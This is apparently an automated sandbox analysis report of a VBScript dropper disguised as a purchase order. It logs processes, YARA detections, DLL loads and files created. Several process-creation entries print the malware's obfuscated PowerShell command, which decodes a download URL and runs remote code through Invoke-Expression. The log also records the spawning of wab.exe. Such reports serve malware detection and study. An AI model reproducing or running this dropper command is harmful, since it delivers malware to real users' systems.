Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed			Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F4CED6	2_2_00007FF848F4CED6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F4DC82	2_2_00007FF848F4DC82
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_000EE58D	8_2_000EE58D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_000EAA3A	8_2_000EAA3A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_000E4A98	8_2_000E4A98
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_000E3E80	8_2_000E3E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_000E41C8	8_2_000E41C8

Java / VBScript file with very long strings (likely obfuscated code)

Source: Texas_Tool_Purchase_Order#T18834-1.vbs

Initial sample: Strings found which are bigger than 50

Yara signature match

Source: amsi64_3012.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_344.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3012, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 344, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@12/7@4/4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Myxogaster.Opv

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3452:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i555qyuf.ryg.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Texas_Tool_Purchase_Order#T18834-1.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3012
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=344
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Texas_Tool_Purchase_Order#T18834-1.vbs	ReversingLabs: Detection: 26%
Source: Texas_Tool_Purchase_Order#T18834-1.vbs	Virustotal: Detection: 30%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Texas_Tool_Purchase_Order#T18834-1.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
